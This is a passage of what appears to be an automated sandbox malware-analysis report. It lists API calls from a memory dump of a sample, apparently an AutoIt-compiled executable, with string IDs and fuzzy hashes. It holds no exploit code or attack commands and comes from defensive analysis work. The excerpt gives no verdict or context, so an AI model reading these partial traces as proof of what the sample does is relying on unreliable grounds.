                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B4180D
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B41833
                          • SysAllocString.OLEAUT32(00000000), ref: 00B41836
                          • SysAllocString.OLEAUT32 ref: 00B41857
                          • SysFreeString.OLEAUT32 ref: 00B41860
                          • SysAllocString.OLEAUT32(?), ref: 00B41888
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: String$Alloc$ByteCharMultiWide$Free
                          • String ID:
                          • API String ID: 1313759350-0
                          • Opcode ID: bcc5d7ca34cc3867894a229c6d32b7c7c0d7a481de2f5530ffa4dece45026198
                          • Instruction ID: b44320b9b15da59b86bc11e3bdd76c8af96b3fc95e87c33f963838a1237518f4
                          • Opcode Fuzzy Hash: bcc5d7ca34cc3867894a229c6d32b7c7c0d7a481de2f5530ffa4dece45026198
                          • Instruction Fuzzy Hash: 0A21A475A00204AF9B00AFACCC88CBA77ECEF093607448566F904DB2A0DA70ED81D760
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 00B084A6: __swprintf.LIBCMT ref: 00B084E5
                            • Part of subcall function 00B084A6: __itow.LIBCMT ref: 00B08519
                            • Part of subcall function 00B03BCF: _wcscpy.LIBCMT ref: 00B03BF2
                          • _wcstok.LIBCMT ref: 00B51D6E
                          • _wcscpy.LIBCMT ref: 00B51DFD
                          • _memset.LIBCMT ref: 00B51E30
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                          • String ID: X
                          • API String ID: 774024439-3081909835
                          • Opcode ID: 46c2e801f143ba83b0cfe070d61bf8d6f60a9974021e8fe9c3e39722b08c75bf
                          • Instruction ID: a26f4002d235693e5f504f56a90f24d4c7633e087840799fcdab296c289d8684
                          • Opcode Fuzzy Hash: 46c2e801f143ba83b0cfe070d61bf8d6f60a9974021e8fe9c3e39722b08c75bf
                          • Instruction Fuzzy Hash: A8C15E715083409FC724EF28C891B5ABBE4EF85310F0449EDF89A972A2DB70ED45CB92
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 00B1B58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00B1B5EB
                            • Part of subcall function 00B1B58B: SelectObject.GDI32(?,00000000), ref: 00B1B5FA
                            • Part of subcall function 00B1B58B: BeginPath.GDI32(?), ref: 00B1B611
                            • Part of subcall function 00B1B58B: SelectObject.GDI32(?,00000000), ref: 00B1B63B
                          • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00B6E9F2
                          • LineTo.GDI32(00000000,00000003,?), ref: 00B6EA06
                          • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00B6EA14
                          • LineTo.GDI32(00000000,00000000,?), ref: 00B6EA24
                          • EndPath.GDI32(00000000), ref: 00B6EA34
                          • StrokePath.GDI32(00000000), ref: 00B6EA44
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                          • String ID:
                          • API String ID: 43455801-0
                          • Opcode ID: 2f52a912588c838df3f6ba2f60fb1bc838ec23fe4c8f1810161519942b61a15b
                          • Instruction ID: 77fdb34522ea2882616739a02e611970e138650d8d787fbaa87fc3718fab7853
                          • Opcode Fuzzy Hash: 2f52a912588c838df3f6ba2f60fb1bc838ec23fe4c8f1810161519942b61a15b
                          • Instruction Fuzzy Hash: E6110976000149BFDF029F94DC88EAA7FADEB08350F048062FA599A1B1DB719D55DBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetDC.USER32(00000000), ref: 00B3EFB6
                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 00B3EFC7
                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B3EFCE
                          • ReleaseDC.USER32(00000000,00000000), ref: 00B3EFD6
                          • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00B3EFED
                          • MulDiv.KERNEL32(000009EC,?,?), ref: 00B3EFFF
                            • Part of subcall function 00B3A83B: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00B3A79D,00000000,00000000,?,00B3AB73), ref: 00B3B2CA
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: CapsDevice$ExceptionRaiseRelease
                          • String ID:
                          • API String ID: 603618608-0
                          • Opcode ID: 8e28487eddcf73962e1cbb6c85bb9a1898bb1cee5b5b01bb59448f209d42c7c7
                          • Instruction ID: 94b8e8ff20579d72686e2fa9ed03e36992b7ea58b9be8fb7e887edc9dd6c7157
                          • Opcode Fuzzy Hash: 8e28487eddcf73962e1cbb6c85bb9a1898bb1cee5b5b01bb59448f209d42c7c7
                          • Instruction Fuzzy Hash: 1C014475A00219BFEB10ABA59C49B5EBFB8EF48751F104066FE04EB2D0DA709D01CF61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • __init_pointers.LIBCMT ref: 00B287D7
                            • Part of subcall function 00B21E5A: __initp_misc_winsig.LIBCMT ref: 00B21E7E
                            • Part of subcall function 00B21E5A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00B28BE1
                            • Part of subcall function 00B21E5A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00B28BF5
                            • Part of subcall function 00B21E5A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00B28C08
                            • Part of subcall function 00B21E5A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00B28C1B
                            • Part of subcall function 00B21E5A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00B28C2E
                            • Part of subcall function 00B21E5A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00B28C41
                            • Part of subcall function 00B21E5A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00B28C54
                            • Part of subcall function 00B21E5A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00B28C67
                            • Part of subcall function 00B21E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00B28C7A
                            • Part of subcall function 00B21E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00B28C8D
                            • Part of subcall function 00B21E5A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00B28CA0
                            • Part of subcall function 00B21E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00B28CB3
                            • Part of subcall function 00B21E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00B28CC6
                            • Part of subcall function 00B21E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00B28CD9
                            • Part of subcall function 00B21E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00B28CEC
                            • Part of subcall function 00B21E5A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00B28CFF
                          • __mtinitlocks.LIBCMT ref: 00B287DC
                            • Part of subcall function 00B28AB3: InitializeCriticalSectionAndSpinCount.KERNEL32(00BBAC68,00000FA0,?,?,00B287E1,00B26AFA,00BB67D8,00000014), ref: 00B28AD1
                          • __mtterm.LIBCMT ref: 00B287E5
                            • Part of subcall function 00B2884D: RtlDeleteCriticalSection.NTDLL(00000000), ref: 00B289CF
                            • Part of subcall function 00B2884D: _free.LIBCMT ref: 00B289D6
                            • Part of subcall function 00B2884D: RtlDeleteCriticalSection.NTDLL(00BBAC68), ref: 00B289F8
                          • __calloc_crt.LIBCMT ref: 00B2880A
                          • GetCurrentThreadId.KERNEL32 ref: 00B28833
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                          • String ID:
                          • API String ID: 2942034483-0
                          • Opcode ID: ca5002824a6122793caeaf6960d0cc2c03c2afed60e1ee7c323a7d5bfe3e28f8
                          • Instruction ID: 1db6d5866002e2f47cda52a790f7b77bac58981eb075417be47625585cb81fde
                          • Opcode Fuzzy Hash: ca5002824a6122793caeaf6960d0cc2c03c2afed60e1ee7c323a7d5bfe3e28f8
                          • Instruction Fuzzy Hash: F5F0E93351B7316AE2347B387C0764A26C0CF11730B604AEAF46CDA0F6FF5198414155
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                          • String ID:
                          • API String ID: 1423608774-0
                          • Opcode ID: dfcf26c27bb32be8403a949aef2e26c0acbde321031631c7d8755394341cc71f
                          • Instruction ID: 279c85e96787a914a4fa9058cec8ec5b0085d2d138983963921c264bbc6b0b1c
                          • Opcode Fuzzy Hash: dfcf26c27bb32be8403a949aef2e26c0acbde321031631c7d8755394341cc71f
                          • Instruction Fuzzy Hash: FF018136141211ABD7152F54ED88DEB7BBAFF89712B00056AF503930B1DF60A900DB55
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00B01898
                          • MapVirtualKeyW.USER32(00000010,00000000), ref: 00B018A0
                          • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00B018AB
                          • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00B018B6
                          • MapVirtualKeyW.USER32(00000011,00000000), ref: 00B018BE
                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B018C6
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Virtual
                          • String ID:
                          • API String ID: 4278518827-0
                          • Opcode ID: a02224c36c50389e849f9904413f4577e4b9cba6ba2839c159f07bc142b6759a
                          • Instruction ID: 1a4f2edc41a23d72609bcbfce8c0e86a46541946d44248f7a0e493f2f7db03b2
                          • Opcode Fuzzy Hash: a02224c36c50389e849f9904413f4577e4b9cba6ba2839c159f07bc142b6759a
                          • Instruction Fuzzy Hash: F60144B0902B5ABDE3008F6A8C85A52FFA8FF19354F04411BA15C47A82C7B5A864CBE5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00B48504
                          • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00B4851A
                          • GetWindowThreadProcessId.USER32(?,?), ref: 00B48529
                          • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B48538
                          • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B48542
                          • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B48549
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                          • String ID:
                          • API String ID: 839392675-0
                          • Opcode ID: 8a7c53159aad0ab1703a42276e99b14c9c8d7681f0619bf40789765c47be7b7e
                          • Instruction ID: 4ca1038d403b3b9f09f9eb9313d7489cee919a41dcf599eb4da2507335710d9c
                          • Opcode Fuzzy Hash: 8a7c53159aad0ab1703a42276e99b14c9c8d7681f0619bf40789765c47be7b7e
                          • Instruction Fuzzy Hash: 6CF03072240158BBE7216B529D0EEEF7B7CDFC6B15F00015AFA05E20A0EBA06A01D7B5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • InterlockedExchange.KERNEL32(?,?), ref: 00B4A330
                          • RtlEnterCriticalSection.NTDLL(?), ref: 00B4A341
                          • TerminateThread.KERNEL32(?,000001F6,?,?,?,00B766D3,?,?,?,?,?,00B0E681), ref: 00B4A34E
                          • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00B766D3,?,?,?,?,?,00B0E681), ref: 00B4A35B
                            • Part of subcall function 00B49CCE: CloseHandle.KERNEL32(?,?,00B4A368,?,?,?,00B766D3,?,?,?,?,?,00B0E681), ref: 00B49CD8
                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 00B4A36E
                          • RtlLeaveCriticalSection.NTDLL(?), ref: 00B4A375
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                          • String ID:
                          • API String ID: 3495660284-0
                          • Opcode ID: 12ae6ed59ebe1cc9ab9944049afff9eb1e704b54c9b8a30c71568f096e0235b5
                          • Instruction ID: edd33b676cbdc55855f59f7528ab1f141edd432b382fe463b41ad1d4f301edb9
                          • Opcode Fuzzy Hash: 12ae6ed59ebe1cc9ab9944049afff9eb1e704b54c9b8a30c71568f096e0235b5
                          • Instruction Fuzzy Hash: 1EF05836181211ABD3512F64ED8CEDB7BBAEF89712B000562F202A20F1DFB5A901DB61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 00B2010A: std::exception::exception.LIBCMT ref: 00B2013E
                            • Part of subcall function 00B2010A: __CxxThrowException@8.LIBCMT ref: 00B20153
                            • Part of subcall function 00B0CAEE: _memmove.LIBCMT ref: 00B0CB2F
                            • Part of subcall function 00B0BBD9: _memmove.LIBCMT ref: 00B0BC33
                          • __swprintf.LIBCMT ref: 00B1D98F
                          Strings
                          • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00B1D832
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                          • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                          • API String ID: 1943609520-557222456
                          • Opcode ID: ae51b920cfe1ed96c42174cbe885ee84237fc60f5bbfe108e2945403828b7fac
                          • Instruction ID: 9d0e1e5db961ea5a19f77c0eb51dfbcc870b4e2074b4213ebecf7a0819a497fa
                          • Opcode Fuzzy Hash: ae51b920cfe1ed96c42174cbe885ee84237fc60f5bbfe108e2945403828b7fac
                          • Instruction Fuzzy Hash: 3D916971118301AFC714EF24C885DAEBBF5EF85740F40499DF59A972A2EB20EE45CB52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • VariantInit.OLEAUT32(?), ref: 00B5B4A8
                          • CharUpperBuffW.USER32(?,?), ref: 00B5B5B7
                          • VariantClear.OLEAUT32(?), ref: 00B5B73A
                            • Part of subcall function 00B4A6F6: VariantInit.OLEAUT32(00000000), ref: 00B4A736
                            • Part of subcall function 00B4A6F6: VariantCopy.OLEAUT32(?,?), ref: 00B4A73F
                            • Part of subcall function 00B4A6F6: VariantClear.OLEAUT32(?), ref: 00B4A74B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Variant$ClearInit$BuffCharCopyUpper
                          • String ID: AUTOIT.ERROR$Incorrect Parameter format
                          • API String ID: 4237274167-1221869570
                          • Opcode ID: 33a1e2070932f5af9dfe3f0db7f2bea7797853a7b761ad113f1b570704bf68de
                          • Instruction ID: 991f15efa5ebb859cf31c200f63b6571b407196ef32bc267c92f25bd33e287e1
                          • Opcode Fuzzy Hash: 33a1e2070932f5af9dfe3f0db7f2bea7797853a7b761ad113f1b570704bf68de
                          • Instruction Fuzzy Hash: AB916C746043019FCB10DF24D495E6ABBE4EF88711F1448EDF88A9B3A1DB31E949CB52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 00B03BCF: _wcscpy.LIBCMT ref: 00B03BF2
                          • _memset.LIBCMT ref: 00B45E56
                          • GetMenuItemInfoW.USER32(?), ref: 00B45E85
                          • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00B45F31
                          • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00B45F5B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: ItemMenu$Info$Default_memset_wcscpy
                          • String ID: 0
                          • API String ID: 4152858687-4108050209
                          • Opcode ID: 64fa2d88f9be3cb7b6e108e03c3586282f11a4a218d0938164d39cd7f925579b
                          • Instruction ID: e1baa5dcfaf5d055d1c85bfbc8bc5e318318c72e2bd81d20e0cb0fa1412693c6
                          • Opcode Fuzzy Hash: 64fa2d88f9be3cb7b6e108e03c3586282f11a4a218d0938164d39cd7f925579b
                          • Instruction Fuzzy Hash: 8A51F271514F01ABD7349B28C884A6BB7E8EF45350F080AADF895D31E2DB70CF49A792
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • _memset.LIBCMT ref: 00B45A93
                          • GetMenuItemInfoW.USER32 ref: 00B45AAF
                          • DeleteMenu.USER32(00000004,00000007,00000000), ref: 00B45AF5
                          • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00BC18F0,00000000), ref: 00B45B3E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Menu$Delete$InfoItem_memset
                          • String ID: 0
                          • API String ID: 1173514356-4108050209
                          • Opcode ID: d2dfc50bfac4d15565a0f93da0a93fbc93fc2c2d2f1714e320ba00d683d6b1de
                          • Instruction ID: f419c378a1589f6efe80cb2ecff0bab3f3a043792c67e9f824d5980c677f5bec
                          • Opcode Fuzzy Hash: d2dfc50bfac4d15565a0f93da0a93fbc93fc2c2d2f1714e320ba00d683d6b1de
